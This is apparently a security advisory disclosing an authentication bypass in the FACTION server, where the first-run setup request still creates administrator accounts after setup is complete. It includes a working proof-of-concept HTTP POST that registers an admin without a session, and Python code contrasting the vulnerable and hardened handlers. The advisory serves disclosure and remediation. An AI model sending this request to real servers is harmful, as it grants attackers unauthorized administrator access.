Closed
Description
Summary
An authentication bypass vulnerability allows an unauthenticated attacker to create an administrator account and thereby access the FACTION server with admin privileges.
Details
Authentication is bypassed because the "Create User" request that the initial setup screen uses to create the first administrator remains accepted after setup is complete. An attacker can send it at any time, without a session or any other authorization, and register a new user in the admins team. The request must satisfy the form's validation rules (no missing fields, a password that meets the complexity requirements and matches its confirmation, etc.), but no other control stops it.
PoC
- Set up FACTION locally using the `docker-compose` script.
- Complete the initial setup screen to create an admin user.
- Send the following request, replacing `localhost` and `8080` as needed (note that no authorization information, such as a session cookie, is included):

```http
POST / HTTP/1.1
Host: localhost:8080
Content-Length: 148
Cache-Control: max-age=0
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9

adminUsername=testadmin2&adminPassword=Testadmin2&confirm=Testadmin2&first=test&last=admin2&[email protected]&team=admins&action=create
```

- Log in with the new `testadmin2` user.
- Observe that the login succeeds and that the new user possesses administrator privileges.
Remediation
The unauthenticated "Create User" endpoint should be disabled as soon as the first user exists. After that point, new native-authentication users should only be creatable by an authenticated, existing administrator; the check must be enforced server-side on the request itself, not by hiding the setup screen.
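To make the remediation concrete, the following is an added illustration (not FACTION's own code) that models the vulnerable handler beside a hardened one. The `UserStore`, `Request` and handler names, the session model and the validation rules are hypothetical; only the form field names (`adminUsername`, `adminPassword`, `confirm`, `first`, `last`, `team`, `action`) come from the PoC request above, and the `email` field name in the constructed body is assumed. The hardened handler keeps the unauthenticated path only while no user exists, and otherwise requires the caller to be an authenticated administrator.

```python
"""Vulnerable vs. hardened model of a first-run "Create User" endpoint.

Added example, not FACTION's code: classes, handler names and the
session model are hypothetical; form field names are from the PoC.
"""
from dataclasses import dataclass, field
from typing import Optional, Tuple
from urllib.parse import parse_qs


@dataclass
class UserStore:
    """Minimal user table: username -> role ("admin" or "user")."""
    users: dict = field(default_factory=dict)

    def has_users(self) -> bool:
        return bool(self.users)

    def create(self, username: str, role: str) -> None:
        self.users[username] = role


@dataclass
class Request:
    method: str
    body: str
    session_user: Optional[str] = None  # None = no session cookie sent


# Constructed replay of the PoC body (email field name is assumed).
POC_BODY = (
    "adminUsername=testadmin2&adminPassword=Testadmin2&confirm=Testadmin2"
    "&first=test&last=admin2&email=testadmin2%40example.invalid"
    "&team=admins&action=create"
)

REQUIRED = ("adminUsername", "adminPassword", "confirm", "first", "last",
            "team", "action")


def parse_form(body: str) -> dict:
    """Decode application/x-www-form-urlencoded into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def validate(form: dict) -> Optional[str]:
    """The form-level rules the PoC must satisfy; hypothetical thresholds."""
    missing = [k for k in REQUIRED if not form.get(k)]
    if missing:
        return "missing: " + ",".join(missing)
    if form["adminPassword"] != form["confirm"]:
        return "password mismatch"
    if len(form["adminPassword"]) < 8:
        return "weak password"
    return None


def vulnerable_create(store: UserStore, req: Request) -> Tuple[int, str]:
    """Pre-fix behaviour: any valid POST creates an admin, no auth checked."""
    form = parse_form(req.body)
    if req.method != "POST" or form.get("action") != "create":
        return 400, "bad request"
    err = validate(form)
    if err:
        return 400, err
    store.create(form["adminUsername"], "admin" if form["team"] == "admins" else "user")
    return 302, "created"


def hardened_create(store: UserStore, req: Request) -> Tuple[int, str]:
    """Remediated: unauthenticated creation only while no user exists."""
    form = parse_form(req.body)
    if req.method != "POST" or form.get("action") != "create":
        return 400, "bad request"
    if store.has_users():
        # Setup is finished: only an authenticated admin may add users.
        if req.session_user is None:
            return 401, "authentication required"
        if store.users.get(req.session_user) != "admin":
            return 403, "administrator required"
    err = validate(form)
    if err:
        return 400, err
    store.create(form["adminUsername"], "admin" if form["team"] == "admins" else "user")
    return 302, "created"


def demo() -> dict:
    """Replay the unauthenticated PoC against both handlers after setup."""
    results = {}
    for name, handler in (("vulnerable", vulnerable_create),
                          ("hardened", hardened_create)):
        store = UserStore({"admin": "admin"})  # state after the setup screen
        status, _ = handler(store, Request("POST", POC_BODY))
        results[name] = (status, "testadmin2" in store.users)
    return results


if __name__ == "__main__":
    print(demo())
```

Running the module replays the PoC against both handlers: the vulnerable one returns a redirect and the store now contains `testadmin2` as an admin, while the hardened one refuses with 401 and the store is unchanged. The same hardened handler still serves the legitimate first-run case (empty store) and an administrator's authenticated request.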